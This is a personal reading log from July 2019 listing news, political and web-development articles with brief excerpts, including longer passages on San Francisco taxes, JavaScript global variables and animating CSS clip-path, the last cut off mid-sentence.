James Reads


Day of Jul 13th, 2019

Day of Jul 12th, 2019

  • New State Climate Law: ‘Compromise Bill’ Nevertheless ‘Historic’

    Governor Andrew Cuomo signed the Climate Leadership and Community Protection Act (CLCPA) into law last week, finalizing legislation that has been labeled “the most aggressive climate change legislation in the nation,” “comprehensive,” and a “historic compromise.

    Read at 03:23 pm, Jul 12th

  • ICE Just Quietly Opened Three New Detention Centers, Flouting Congress’ Limits

    When members of Congress reached a bipartisan deal to end the government shutdown in February, they gave Immigration and Customs Enforcement a simple instruction: Stop detaining so many people.

    Read at 09:20 pm, Jul 12th

  • NYPD let convicted pedophile Jeffrey Epstein skip judge-ordered check-ins

    Convicted pedophile Jeffrey Epstein never once checked in with city cops in the eight-plus years since a Manhattan judge ordered him to do so every 90 days — and the NYPD says it’s fine with that.

    Read at 04:54 pm, Jul 12th

  • It Was Never About Busing

    When Senator Kamala Harris confronted former Vice President Joe Biden at the second Democratic presidential debate about his support of bills to ban busing for school desegregation during the 1970s and early ’80s, he gave a sort of denial. “I did not oppose busing in America,” he said.

    Read at 04:51 pm, Jul 12th

  • Image Compression with Expo CLI

    Images often take up the most space out of any asset type in mobile apps given how prevalent they are and how large they can be. At Expo, we want to help you optimize your apps as much as possible to speed up download times and decrease storage space for your end users.

    Read at 04:16 pm, Jul 12th

  • Let’s talk about sex

    It’s been a long time since I’ve talked about sex or relationships on the internet. And the last time, I really didn’t even touch on sex — I wasn’t confident enough in myself or how to speak to my sexuality to wade into that topic.

    Read at 04:08 pm, Jul 12th

  • Beating Trump and Building Working Class Power in 2020

    Most years begin (or end) with the usual hand wringing and angst over the existential future of organized labor – “Is there any hope for labor to survive?” “Are unions still relevant?” But not this year.

    Read at 03:58 pm, Jul 12th

  • ‘Outright disrespectful’: Four House women struggle as Pelosi isolates them 

    House Speaker Nancy Pelosi admonished Democrats for personally attacking one another, warning in a closed-door meeting Wednesday that the party’s fracturing was jeopardizing its majority. “You got a complaint? You come and talk to me about it.

    Read at 03:39 pm, Jul 12th

  • Thousands Are Targeted as ICE Prepares to Raid Undocumented Migrant Families

    Nationwide raids to arrest thousands of members of undocumented families have been scheduled to begin Sunday, according to two current and one former homeland security officials, moving forward with a rapidly changing operation, the final details of which remain in flux.

    Read at 05:11 pm, Jul 12th

  • Warren, Biden Campaigns Appear to Find Loophole Around Paid Internships

    Unpaid interns are practically non-existent among Democratic presidential campaigns in 2019. But some top-tier candidates appear to be finding a creative way to tap unpaid talent: offering vague “fellowship” opportunities as volunteer positions.

    Read at 03:04 pm, Jul 12th

  • The Jeffrey Epstein case is why people believe in Pizzagate

    The arrest of the apparent billionaire investor Jeffrey Epstein at a New Jersey airport on Saturday on federal charges for crimes he was accused of during the Bush administration should not be surprising to anyone who has followed the news carefully.

    Read at 02:22 pm, Jul 12th

  • Amazon Workers Plan Prime Day Strike at a Minnesota Warehouse

    Amazon.com Inc. warehouse workers in Minnesota plan to strike during the online retailer’s summer sales extravaganza, a sign that labor unrest persists even after the company committed to paying all employees at least $15 an hour last year.

    Read at 09:48 am, Jul 12th

  • The Problem With HR

    For 30 years, we’ve trusted human-resources departments to prevent and address workplace sexual harassment. How’s that working out?

    Read at 09:34 am, Jul 12th

  • Using Rust to Scale Elixir for 11 Million Concurrent Users

    Over the last year, the Backend Infrastructure team at Discord was hard at work improving the scalability and performance of our core real-time communications infrastructure.

    Read at 09:13 am, Jul 12th

  • The More, the Better: San Francisco Leads New Kind of Tax Revolt

    San Francisco is emerging as one of the most receptive places in the country for new taxes. In recent weeks: San Francisco leaders supported the proposed overhaul of the city’s gross receipts tax structure, which would be the fourth tax-raising proposal on the city’s November ballot. A San Francisco Superior Court judge upheld an initiative raising commercial lease taxes to fund early childhood education and upheld a Salesforce.com-backed initiative imposing gross receipts taxes on companies earning more than $50 million to support homeless services. A pair of recent court rulings upheld locally passed tax initiatives—including one backing the city’s authority to seek taxes from drivers who use paid parking lots at state universities—which could embolden tax enthusiasts in San Francisco even more. “I think SF is going to be the poster child, one way or another, for aggressively looking for money from business,” Joseph Bankman, Stanford University professor of law and business, said in an email. Expect a ripple effect as local officials around the state talk about what worked in San Francisco and how to push the envelope in their own localities, said Rex Hime, president and CEO of the California Business Properties Association. The trade group’s members include Target Inc., Regency Centers Corp., and CBRE Group Inc. “I think we all know that once something violates the process that others certainly follow suit thereafter, so we anticipate there will be a lot of these kinds of elections up and down the state,” Hime said. The impact is clear for his members: “The property owners can‘t leave. The tenants can.” Voters over the past two decades approved taxes to pay for services or programs on top of existing taxes used to cover bonds and schools. Governments and taxpayers probably haven’t yet reached the tax saturation point but may be there in a decade, said Larry Tramutola, an election consultant who shepherded successful sugar-sweetened beverage taxes in San Francisco, Oakland, Berkeley, and Albany, Calif., and Boulder, Colo. “And no one knows when the golden goose is going to stop laying the golden eggs. But at some point, there’s going to be fewer eggs or no eggs in some communities. We just haven’t gotten there yet.” Tramutola said. Setting the Trend For now, San Francisco is the trendsetter. It’s the first major California city to test a state Supreme Court decision involving the Southern California city of Upland that supported the argument that tax initiatives by local governments can pass by a simple majority vote. “The July 5th ruling would open the door for local governments to use the initiative process to avoid the two-thirds voter approval margin entirely and pass more special taxes, but next we will see how the Court of Appeal interprets the issues,” Laura Dougherty, a staff attorney with the Howard Jarvis Taxpayers Association, which challenged the initiatives, said in an email. Howard Jarvis and the California Business Properties Association filed a notice of appeal July 8. San Francisco leaders, in addition to putting the gross receipts overhaul on the ballot, are supporting three new taxes for the November election: an excessive CEO salary tax, a 1.5% to 3.25% tax on shared rides, and a stock-based compensation tax. “Regardless, all of these tax measures will require voter approval within the City and County of San Francisco,” said Kelly Salt, a public finance partner with Best Best & Krieger LLP in San Diego. “And as you well know, the cost of living there is already very high and will become more burdensome as a result of tax measures such as these. Ultimately, it is a matter of how much more of a tax burden voters are willing to tolerate.” Gross Receipts Revamp Mayor London Breed (D) and board President Norman Yee asked the city controller to develop a next-generation tax to replace the gross receipts structure voters adopted in 2012. That measure, also led by the Controller’s office, was implemented to phase out the much-despised 1.5% payroll tax. The payroll tax now stands at 0.38%, as the phase out hasn’t been completely revenue neutral. Breed and Yee requested an initiative to create a more efficient tax system while ensuring the system is fair and equitable, including for small businesses. The effort would also identify ways to generate additional revenue to address the cost of housing and homelessness, support youth and families, improve behavioral health, and enhance the city’s public transportation system, a July 3 statement said. An overarching plan is needed for San Francisco’s “current very complex patchwork of taxes, suspension of phase outs, more proposals on the way,” said Charles Moll III, a McDermott Will & Emery LLP tax law partner in San Francisco. But “any talk about a fair and equitable system usually means new and higher taxes.” Michael Colantuono, managing partner and municipal finance attorney at Colantuono, Highsmith & Whatley PC in Grass Valley, Calif., shrugged at San Francisco’s latest effort. “LA periodically goes through business tax reviews. Goal is always to maintain or increase revenues while reducing bureaucratic impositions on business. Their lack of success explains why my So Cal office is in Pasadena,” Colantuono said in an email. Fueling Tax Fire San Francisco used the Upland decision for a City Attorney opinion to conclude “it seems very likely that voters may now propose special taxes by initiative subject only to majority vote.” “In light of the multiple lawsuits filed to date, the courts or, ultimately, the California Supreme Court, will have to answer the question of whether the Upland ruling extends to the voter approval threshold for citizen initiatives proposing special taxes,” said Best Best & Krieger’s Salt. Ultimately, Salt said, California voters may be the ones to answer this question by amending the state constitution. Until then, local governments leave themselves open for litigation whether they collect a special tax approved by majority vote or decline to collect it, she said. San Francisco Dreaming San Francisco’s push for new taxes may be replicated by other local governments. “Locals are always eager for new revenues for many reasons that can lead to desperate measures such as trying to enact new taxes that often are not well designed. Locals face challenges of an eroding sales tax base in California. As we move to more services and digital goods, and less tangible personal property, locals see reduced sales tax collection,” said Annette Nellen, director of San Jose State University’s master of taxation program. Many places that tax goods, say weights bought at Wal-Mart to use in the garage, don’t tax services, say fees at the local gym where users can lift weights untaxed, said Tracy Gordon, senior fellow in the Urban-Brookings Tax Policy Center. “The point is it is consumption. People who have a lot of resources, you can decide whether you tax their income or yoga studios. Yoga studios are a great thing to tax because they’re not mobile because they’re trying to serve a community or neighborhood,” said Gordon. Among those waiting to see what happens with San Francisco’s litigation are Oakland and Fresno. Oakland, across San Francisco Bay, is defending its decision to declare a parcel tax was valid even though the measure only received a majority vote. In the Central San Joaquin Valley, Fresno was sued for not validating a sales tax measure that only received 52.17% of the vote. “If Oakland can, and others can as well, you’re going to see an avalanche of tax measures because the thing that has kept cities primarily from putting on tax measures is the difficult threshold of two thirds,” said Tramutola, the election consultant. Source: The More, the Better: San Francisco Leads New Kind of Tax Revolt

    Read at 11:32 am, Jul 12th

  • How do JavaScript’s global variables really work?

    In this blog post, we examine how JavaScript’s global variables work. Several interesting phenomena play a role: the scope of scripts, the so-called global object, and more. more Scopes   The lexical scope (short: scope) of a variable is the region of a program where it can be accessed. JavaScript’s scopes are static (they don’t change at runtime) and they can be nested – for example: The scope introduced by the if statement (line B) is nested inside the scope of function func() (line A). The innermost surrounding scope of a scope S is called the outer scope of S. In the example, func is the outer scope of if. Lexical environments   In the JavaScript language specification, scopes are “implemented” via lexical environments. They consist of two components: An environment record (think dictionary) that maps variable names to variable values. This is where JavaScript stores variables. One key-value entry in the environment record is called a binding. A reference to the outer environment – the environment representing the outer scope of the scope represented by the current environment. The tree of nested scopes is therefore represented by a tree of nested environments, linked by outer references. The global object   The global object is an object whose properties are global variables. (We’ll examine soon how exactly it fits into the tree of environments.) It has several different names: Everywhere (proposed feature): globalThis Other names for the global object depend on platform and language construct: window: is the classic way of referring to the global object. But it only works in normal browser code; not in Node.js and not in Web Workers (processes running concurrently to normal browser code). BOOK: link to #web-workers self: is available everywhere in browsers, including in Web Workers. But it isn’t supported by Node.js. global: is only available in Node.js. The global object contains all built-in global variables. The global environment   The global scope is the “outermost” scope – it has no outer scope. Its environment is the global environment. Every environment is connected with the global environment via a chain of environments that are linked by outer references. The outer reference of the global environment is null. The global environment combines two environment records: An object environment record that works like a normal environment record, but keeps its bindings in sync with an object. In this case, the object is the global object. A normal (declarative) environment record. The following diagram shows these data structures. Script scope and module environments are explained soon. The next two subsections explain how the object record and the declarative record are combined. Creating variables   In order to create a variable that is truly global, you must be in global scope – which is only the case at the top level of scripts: Top-level const, let, and class create bindings in the declarative record. Top-level var and function declarations create bindings in the object record. one = ; two = ; .log(one); .log(two); .log(.one); .log(.two); Additionally, the global object contains all built-in global variables and contributes them to the global environment via the object record. Getting or setting variables   When we get or set a variable and both environment records have a binding for that variable, then the declarative record wins: foo = ; globalThis.foo = ; .log(foo); .log(globalThis.foo); Module environments   Each module has its own environment. It stores all top-level declarations – including imports. The outer environment of a module environment is the global environment. The global object is generally considered to be a mistake. For that reason, newer constructs such as const, let, and classes create normal global variables (when in script scope). Thankfully, most of the code written in modern JavaScript, lives in ECMAScript modules and CommonJS modules. Each module has its own scope, which is why the rules governing global variables rarely matter for module-based code. Further reading   Source: How do JavaScript’s global variables really work?

    Read at 08:19 am, Jul 12th

Day of Jul 11th, 2019

  • ‘This doesn’t look like the best economy ever’: 40% of Americans say they still struggle to pay bills

    Sommer Johnson thought everything was finally coming together for her last year.

    Read at 09:39 am, Jul 11th

  • Announcing the Stable Release of Gatsby Themes!

    What are Gatsby themes? Using a Gatsby theme, all of your default configuration (shared functionality, data sourcing, design) is abstracted out of your site, and into an installable package.

    Read at 05:38 pm, Jul 11th

  • Design patterns in Node.js: a practical guide

    Design patterns are part of the day to day of any software developer, whether they realize it or not. In this article, we will look at how to identify these patterns out in the wild and look at how you can start using them in your own projects.

    Read at 05:32 pm, Jul 11th

  • AFL-CIO leadership: the two women vying to be America's top labor official

    Liz Shuler and Sara Nelson have many things in common – both are from Oregon, both are in their 40s, and both are prominent labor leaders. Shuler is secretary-treasurer of the AFL-CIO, the nation’s largest labor federation, Nelson is president of the Association of Flight Attendants.

    Read at 05:22 pm, Jul 11th

  • Medicare for All Goes to the Hill

    House of Representatives committee hearings for Medicare for All are finally starting today. It’s a testament to M4A’s rising popularity — but overcoming opposition from Republicans, Democrats, and the health care companies will require a mass movement.

    Read at 05:15 pm, Jul 11th

  • Tree planting 'has mind-blowing potential' to tackle climate crisis

    Planting billions of trees across the world is by far the biggest and cheapest way to tackle the climate crisis, according to scientists, who have made the first calculation of how many more trees could be planted without encroaching on crop land or urban areas.

    Read at 05:09 pm, Jul 11th

  • Employee Activism Is Alive in Tech. It Stops Short of Organizing Unions.

    SAN FRANCISCO — In February, about a dozen employees at a small technology company called NPM embarked on an effort that is often frowned upon at start-ups: trying to unionize.

    Read at 05:05 pm, Jul 11th

  • ICE Used Facial Recognition to Mine State Driver’s License Databases

    WASHINGTON — Immigration and Customs Enforcement officials have mined state driver’s license databases using facial recognition technology, analyzing millions of motorists’ photos without their knowledge.

    Read at 03:33 pm, Jul 11th

  • Why Did I Have Difficulty Learning React?

    Just over six months into a job doing React development, I’ve been trying to figure out why it has taken me so long to feel comfortable with it. (Comfortable feels a bit too ambitious of a word. Maybe competent? Unexceptional? Whichever.) Working at Abstract meant learning their tech stack.

    Read at 02:37 pm, Jul 11th

  • AVA 1.0 ?

    Back in January we started work on the 1.0 release, taking the opportunity to upgrade to Babel 7 and follow its beta releases. It’s been a year where we made massive improvements to AVA. It’s also been a year with many exciting events in our personal lives.

    Read at 02:00 pm, Jul 11th

  • A Crime by Any Name

    The horrors detailed in the press were hard to believe. Such were the conditions of the Confederate prisoner-of-war camp at Andersonville, Georgia, where, as the historian James McPherson wrote, 13,000 of the 45,000 men imprisoned “died of disease, exposure, or malnutrition.

    Read at 09:56 am, Jul 11th

  • Justin Amash: Our politics is in a partisan death spiral. That’s why I’m leaving the GOP.

    When my dad was 16, America welcomed him as a Palestinian refugee. It wasn’t easy moving to a new country, but it was the greatest blessing of his life.

    Read at 09:54 am, Jul 11th

  • Monorepo: please do!

    You should choose a monorepo because the default behavior it encourages in your teams is visibility and shared responsibility, especially as teams scale.

    Read at 09:44 am, Jul 11th

  • The “Other Side” Is Not Dumb

    There’s a fun game I like to play in a group of trusted friends called “Controversial Opinion.

    Read at 05:37 pm, Jul 11th

  • The Deepening Crisis in Evangelical Christianity

    Last week, Ralph Reed, the Faith and Freedom Coalition’s founder and chairman, told the group, “There has never been anyone who has defended us and who has fought for us, who we have loved more than Donald J. Trump. No one!”

    Read at 09:33 am, Jul 11th

  • Monorepos: Please don’t!

    Here we are at the beginning of 2019 and I’m engaged in yet another discussion on the merits (or lack thereof) of keeping all of an organization’s code in a “monorepo.

    Read at 09:24 am, Jul 11th

  • Rethinking Unit Test Assertions

    Well written automated tests always act as a good bug report when they fail, but few developers spend time to think about what information a good bug report needs. There are 5 questions every unit test must answer. I’ve described them in detail before, so we’ll just skim them this time:

    Read at 08:26 am, Jul 11th

  • Generate Primary Keys (almost) Automatically

    This is really baaaad! Why is that bad? Well, you should not ask, but let’s keep the poor database design alone and focus on some more concrete problems: in particular not having a primary key prevents a lot of smart softwares and middlewares to work on your database.

    Read at 08:22 am, Jul 11th

  • Paid Sick Leave & Capitalism in Southern Maine — Build

    Many of the stories featured in Build’s publications are tales of success. This makes sense, because people want to know what works.

    Read at 07:42 am, Jul 11th

  • Animating with Clip-Path | CSS-Tricks

    clip-path is one of those CSS properties we generally know is there but might not reach for often for whatever reason. It’s a little intimidating in the sense that it feels like math class because it requires working with geometric shapes, each with different values that draw certain shapes in certain ways. We’re going to dive right into clip-path in this article, specifically looking at how we can use it to create pretty complex animations. I hope you’ll see just how awesome the property and it’s shape-shifting powers can be. But first, let’s do a quick recap of what we’re working with. Clip-path crash course Just for a quick explanation as to what the clip-path is and what it provides, MDN describes it like this: The clip-path CSS property creates a clipping region that sets what part of an element should be shown. Parts that are inside the region are shown, while those outside are hidden. Consider the circle shape provided by clip-path. Once the circle is defined, the area inside it can be considered "positive" and the area outside it "negative." The positive space is rendered while the negative space is removed. Taking advantage of the fact that this relationship between positive and negative space can be animated provides for interesting transition effects… which is what we’re getting into in just a bit. clip-path comes with four shapes out of the box, plus the ability to use a URL to provide a source to some other SVG <clipPath> element. I’ll let the CSS-Tricks almanac go into deeper detail, but here are examples of those first four shapes. Shape Example Result Circle clip-path: circle(25% at 25% 25%); Ellipse clip-path: ellipse(25% 50% at 25% 50%); Inset clip-path: inset(10% 20% 30% 40% round 25%); Polygon clip-path: polygon(50% 25%, 75% 75%, 25% 75%); Combining clippings with CSS transitions Animating clip-path can be as simple as changing the property values from one shape to another using CSS transitions, triggered either by changing classes in JavaScript or an interactive change in state, like :hover: .box { clip-path: circle(75%); transition: clip-path 1s; } .box:hover { clip-path: circle(25%); } See the Pen clip-path with transition by Geoff Graham (@geoffgraham) on CodePen. We can also use CSS animations: @keyframes circle { 0% { clip-path: circle(75%); } 100% { clip-path: circle(25%); } } See the Pen clip-path with CSS animation by Geoff Graham (@geoffgraham) on CodePen. Some things to consider when animating clip-path: It only affects what is rendered and does not change the box size of the element as relating to elements around it. For example, a floated box with text flowing around it will still take up the same amount of space even with a very small percentage clip-path applied to it. Any CSS properties that extend beyond the box size of the element may be clipped. For example, an inset of 0% for all four sides that clips at the edges of the element will remove a box-shadow and require a negative percentage to see the box-shadow. Although, that could lead to interesting effects in of itself! OK, let’s get into some light animation to kick things off. Comparing the simple shapes I’ve put together a demo where you can see each shape in action, along with a little explanation describing what’s happening. See the Pen Animating Clip-Path: Simple Shapes by Travis Almand (@talmand) on CodePen. The demo makes use of Vue for the functionality, but the CSS is easily transferred to any other type of project. We can break those out a little more to get a handle on the values for each shape and how changing them affects the movement Circle clip-path: circle(<length|percentage> at <position>); Circle accepts two properties that can be animated: Shape radius: can be a length or percentage Position: can be a length or percentage along the x and y axis .circle-enter-active { animation: 1s circle reverse; } .circle-leave-active { animation: 1s circle; } @keyframes circle { 0% { clip-path: circle(75%); } 100% { clip-path: circle(0%); } } The circle shape is resized in the leave transition from an initial 75% radius (just enough to allow the element to appear fully) down to 0%. Since no position is set, the circle defaults to the center of the element both vertically and horizontally. The enter transition plays the animation in reverse by means of the "reverse" keyword in the animation property. Ellipse clip-path: ellipse(<length|percentage>{2} at <position>); Ellipse accepts three properties that can be animated: Shape radius: can be a length or percentage on the horizontal axis Shape radius: can be a length or percentage on the vertical axis Position: can be a length or percentage along the x and y axis .ellipse-enter-active { animation: 1s ellipse reverse; } .ellipse-leave-active { animation: 1s ellipse; } @keyframes ellipse { 0% { clip-path: ellipse(80% 80%); } 100% { clip-path: ellipse(0% 20%); } } The ellipse shape is resized in the leave transition from an initial 80% by 80%, which makes it a circular shape larger than the box, down to 0% by 20%. Since no position is set, the ellipse defaults to the center of the box both vertically and horizontally. The enter transition plays the animation in reverse by means of the "reverse" keyword in the animation property. The effect is a shrinking circle that changes to a shrinking ellipse taller than wide wiping away the first element. Then the elements switch with the second element appearing inside the growing ellipse. Inset clip-path: inset(<length|percentage>{1,4} round <border-radius>{1,4}); The inset shape has up to five properties that can be animated. The first four represent each edge of the shape and behave similar to margins or padding. The first property is required while the next three are optional depending on the desired shape. Length/Percentage: can represent all four sides, top/bottom sides, or top side Length/Percentage: can represent left/right sides or right side Length/Percentage: represents the bottom side Length/Percentage: represents the left side Border radius: requires the "round" keyword before the value One thing to keep in mind is that the values used are reversed from typical CSS usage. Defining an edge with zero means that nothing has changed, the shape is pushed outward to the element’s side. As the number is increased, say to 10%, the edge of the shape is pushed inward away from the element’s side. .inset-enter-active { animation: 1s inset reverse; } .inset-leave-active { animation: 1s inset; } @keyframes inset { 0% { clip-path: inset(0% round 0%); } 100% { clip-path: inset(50% round 50%); } } The inset shape is resized in the leave transition from a full-sized square down to a circle because of the rounded corners changing from 0% to 50%. Without the round value, it would appear as a shrinking square. The enter transition plays the animation in reverse by means of the "reverse" keyword in the animation property. The effect is a shrinking square that shifts to a shrinking circle wiping away the first element. After the elements switch the second element appears within the growing circle that shifts to a growing square. Polygon clip-path: polygon(<length|percentage>); The polygon shape is a somewhat special case in terms of the properties it can animate. Each property represents vertices of the shape and at least three is required. The number of vertices beyond the required three is only limited by the requirements of the desired shape. For each keyframe of an animation, or the two steps in a transition, the number of vertices must always match for a smooth animation. A change in the number of vertices can be animated, but will cause a popping in or out effect at each keyframe. .polygon-enter-active { animation: 1s polygon reverse; } .polygon-leave-active { animation: 1s polygon; } @keyframes polygon { 0% { clip-path: polygon(0 0, 50% 0, 100% 0, 100% 50%, 100% 100%, 50% 100%, 0 100%, 0 50%); } 100% { clip-path: polygon(50% 50%, 50% 25%, 50% 50%, 75% 50%, 50% 50%, 50% 75%, 50% 50%, 25% 50%); } } The eight vertices in the polygon shape make a square with a vertex in the four corners and the midpoint of all four sides. On the leave transition, the shape’s corners animate inwards to the center while the side’s midpoints animate inward halfway to the center. The enter transition plays the animation in reverse by means of the "reverse" keyword in the animation property. The effect is a square that collapses inward down to a plus shape that wipes away the element. The elements then switch with the second element appears in a growing plus shape that expands into a square. Let’s get into some simple movements OK, we’re going to dial things up a bit now that we’ve gotten past the basics. This demo shows various ways to have movement in a clip-path animation. The circle and ellipse shapes provide an easy way to animate movement through the position of the shape. The inset and polygon shapes can be animated in a way to give the appearance of position-based movement. See the Pen Animating Clip-Path: Simple Movements by Travis Almand (@talmand) on CodePen. Let’s break those out just like we did before. Slide Down The slide down transition consists of two different animations using the inset shape. The first, which is the leave animation, animates the top value of the inset shape from 0% to 100% providing the appearance of the entire square sliding downward out of view. The second, which is the enter animation, has the bottom value at 100% and then animates it down towards 0% providing the appearance of the entire square sliding downward into view. .down-enter-active { animation: 1s down-enter; } .down-leave-active { animation: 1s down-leave; } @keyframes down-enter { 0% { clip-path: inset(0 0 100% 0); } 100% { clip-path: inset(0); } } @keyframes down-leave { 0% { clip-path: inset(0); } 100% { clip-path: inset(100% 0 0 0); } } As you can see, the number of sides being defined in the inset path do not need to match. When the shape needs to be the full square, a single zero is all that is required. It can then animate to the new state even when the number of defined sides increases to four. Box-Wipe The box-wipe transition consists of two animations, again using the inset shape. The first, which is the leave animation, animates the entire square down to a half-size squared positioned on the element’s left side. The smaller square then slides to the right out of view. The second, which is the enter animation, animates a similar half-size square into view from the left over to the element’s right side. Then it expands outward to reveal the entire element. .box-wipe-enter-active { animation: 1s box-wipe-enter; } .box-wipe-leave-active { animation: 1s box-wipe-leave; } @keyframes box-wipe-enter { 0% { clip-path: inset(25% 100% 25% -50%); } 50% { clip-path: inset(25% 0% 25% 50%); } 100% { clip-path: inset(0); } } @keyframes box-wipe-leave { 0% { clip-path: inset(0); } 50% { clip-path: inset(25% 50% 25% 0%); } 100% { clip-path: inset(25% -50% 25% 100%); } } When the full element is shown, the inset is at zero. The 50% keyframes define a half-size square that is placed on either the left or right. There are two values representing the left and right edges are swapped. Then the square is then moved to the opposite side. As one side is pushed to 100%, the other must go to -50% to maintain the shape. If it were to animate to zero instead of -50%, then the square would shrink as it animated across instead of moving out of view. Rotate The rotate transition is one animation with five keyframes using the polygon shape. The initial keyframe defines the polygon with four vertices that shows the entire element. Then, the next keyframe changes the x and y coordinates of each vertex to be moved inward and near the next vertex in a clockwise fashion. After all four vertices have been transitioned, it appears the square has shrunk and rotated a quarter turn. The following keyframes do the same until the square is collapsed down to the center of the element. The leave transition plays the animation normally while the enter transition plays the animation in reverse. .rotate-enter-active { animation: 1s rotate reverse; } .rotate-leave-active { animation: 1s rotate; } @keyframes rotate { 0% { clip-path: polygon(0% 0%, 100% 0%, 100% 100%, 0% 100%); } 25% { clip-path: polygon(87.5% 12.5%, 87.5% 87.5%, 12.5% 87.5%, 12.5% 12.5%); } 50% { clip-path: polygon(75% 75%, 25% 75%, 25% 25%, 75% 25%); } 75% { clip-path: polygon(37.5% 62.5%, 37.5% 37.5%, 62.5% 37.5%, 62.5% 62.5%); } 100% { clip-path: polygon(50% 50%, 50% 50%, 50% 50%, 50% 50%); } } Polygons can be animated into any other position once its vertices have been set, as long as each keyframe has the same number of vertices. This can make many interesting effects with careful planning. Spotlight The spotlight transition is one animation with five keyframes using the circle shape. The initial keyframe defines a full-size circle positioned at the center to show the entire element. The next keyframe shrinks the circle down to twenty percent. Each following keyframe animates the position values of the circle to move it to different points on the element until it moves out of view to the left. The leave transition plays the animation normally while the enter transition plays the animation in reverse. .spotlight-enter-active { animation: 2s spotlight reverse; } .spotlight-leave-active { animation: 2s spotlight; } @keyframes spotlight { 0% { clip-path: circle(100% at 50% 50%); } 25% { clip-path: circle(20% at 50% 50%); } 50% { clip-path: circle(20% at 12% 84%); } 75% { clip-path: circle(20% at 93% 51%); } 100% { clip-path: circle(20% at -30% 20%); } } This may be a complex-looking animation at first, but turns out it only requires simple changes in each keyframe. More adventurous stuff Like the shapes and simple movements examples, I’ve made a demo that contains more complex animations. We’ll break these down individually as well. See the Pen Animating Clip-Path: Complex Shapes by Travis Almand (@talmand) on CodePen. All of these examples make heavy use of the polygon shape. They take advantage of features like stacking vertices to make elements appear "welded" and repositioning vertices around for movement. Check out Ana Tudor’s "Cutting out the inner part of an element using clip-path" article for a more in-depth example that uses the polygon shape to create complex shapes. Chevron The chevron transition is made of two animations, each with three keyframes. The leave transition starts out as a full square with six vertices; there are the four corners but there are an additional two vertices on the left and right sides. The second keyframe animates three of the vertices into place to change the square into a chevron. The third keyframe then moves the vertices out of view to the right. After the elements switch, the enter transition starts with the same chevron shape but it is out of view on the left. The second keyframe moves the chevron into view and then the third keyframe restores the full square. .chevron-enter-active { animation: 1s chevron-enter; } .chevron-leave-active { animation: 1s chevron-leave; } @keyframes chevron-enter { 0% { clip-path: polygon(-25% 0%, 0% 50%, -25% 100%, -100% 100%, -75% 50%, -100% 0%); } 75% { clip-path: polygon(75% 0%, 100% 50%, 75% 100%, 0% 100%, 25% 50%, 0% 0%); } 100% { clip-path: polygon(100% 0%, 100% 50%, 100% 100%, 0% 100%, 0% 50%, 0% 0%); } } @keyframes chevron-leave { 0% { clip-path: polygon(100% 0%, 100% 50%, 100% 100%, 0% 100%, 0% 50%, 0% 0%); } 25% { clip-path: polygon(75% 0%, 100% 50%, 75% 100%, 0% 100%, 25% 50%, 0% 0%); } 100% { clip-path: polygon(175% 0%, 200% 50%, 175% 100%, 100% 100%, 125% 50%, 100% 0%) } } Spiral The spiral transition is a strong example of a complicated series of vertices in the polygon shape. The polygon is created to define a shape that spirals inward clockwise from the upper-left of the element. Since the vertices create lines that stack on top of each other, it all appears as a single square. Over the eight keyframes of the animation, vertices are moved to be on top of neighboring vertices. This makes the shape appear to unwind counter-clockwise to the upper-left, wiping away the element during the leave transition. The enter transition replays the animation in reverse. .spiral-enter-active { animation: 1s spiral reverse; } .spiral-leave-active { animation: 1s spiral; } @keyframes spiral { 0% { clip-path: polygon(0% 0%, 100% 0%, 100% 100%, 0% 100%, 0% 25%, 75% 25%, 75% 75%, 25% 75%, 25% 50%, 50% 50%, 25% 50%, 25% 75%, 75% 75%, 75% 25%, 0% 25%); } 14.25% { clip-path: polygon(0% 0%, 100% 0%, 100% 100%, 0% 100%, 0% 25%, 75% 25%, 75% 75%, 50% 75%, 50% 50%, 50% 50%, 25% 50%, 25% 75%, 75% 75%, 75% 25%, 0% 25%); } 28.5% { clip-path: polygon(0% 0%, 100% 0%, 100% 100%, 0% 100%, 0% 25%, 75% 25%, 75% 50%, 50% 50%, 50% 50%, 50% 50%, 25% 50%, 25% 75%, 75% 75%, 75% 25%, 0% 25%); } 42.75% { clip-path: polygon(0% 0%, 100% 0%, 100% 100%, 0% 100%, 0% 25%, 25% 25%, 25% 50%, 25% 50%, 25% 50%, 25% 50%, 25% 50%, 25% 75%, 75% 75%, 75% 25%, 0% 25%); } 57% { clip-path: polygon(0% 0%, 100% 0%, 100% 100%, 0% 100%, 0% 75%, 25% 75%, 25% 75%, 25% 75%, 25% 75%, 25% 75%, 25% 75%, 25% 75%, 75% 75%, 75% 25%, 0% 25%); } 71.25% { clip-path: polygon(0% 0%, 100% 0%, 100% 100%, 75% 100%, 75% 75%, 75% 75%, 75% 75%, 75% 75%, 75% 75%, 75% 75%, 75% 75%, 75% 75%, 75% 75%, 75% 25%, 0% 25%); } 85.5% { clip-path: polygon(0% 0%, 100% 0%, 100% 25%, 75% 25%, 75% 25%, 75% 25%, 75% 25%, 75% 25%, 75% 25%, 75% 25%, 75% 25%, 75% 25%, 75% 25%, 75% 25%, 0% 25%); } 100% {clip-path: polygon(0% 0%, 0% 0%, 0% 0%, 0% 0%, 0% 0%, 0% 0%, 0% 0%, 0% 0%, 0% 25%, 0% 25%, 0% 25%, 0% 25%, 0% 25%, 0% 25%, 0% 25%); } } Slots The slots transition is made of a series of vertices arranged in a pattern of vertical slots with vertices stacked on top of each other for a complete square. The general idea is that the shape starts in the upper-left and the next vertex is 14% to the right. Next vertex is in the exact same spot. Then the one after that is another 14% to the right, and so on until the upper-right corner is reached. This creates a series of "sections" along the top of the shape that are aligned horizontally. The second keyframe then animates every even section downward to the bottom of the element. This gives the appearance of vertical slots wiping away their parts of the element. The third keyframe then moves the remaining sections at the top to the bottom. Overall, the leave transition wipes away half the element in vertical slots and then the other half. The enter transition reverses the animation. .slots-enter-active { animation: 1s slots reverse; } .slots-leave-active { animation: 1s slots; } @keyframes slots { 0% { clip-path: polygon(0% 0%, 14% 0%, 14% 0%, 28% 0%, 28% 0%, 42% 0%, 42% 0%, 56% 0%, 56% 0%, 70% 0%, 70% 0%, 84% 0%, 84% 0%, 100% 0, 100% 100%, 0% 100%); } 50% { clip-path: polygon(0% 0%, 14% 0%, 14% 100%, 28% 100%, 28% 0%, 42% 0%, 42% 100%, 56% 100%, 56% 0%, 70% 0%, 70% 100%, 84% 100%, 84% 0%, 100% 0, 100% 100%, 0% 100%); } 100% { clip-path: polygon(0% 100%, 14% 100%, 14% 100%, 28% 100%, 28% 100%, 42% 100%, 42% 100%, 56% 100%, 56% 100%, 70% 100%, 70% 100%, 84% 100%, 84% 100%, 100% 100%, 100% 100%, 0% 100%); } } Shutters The shutters transition is very similar to 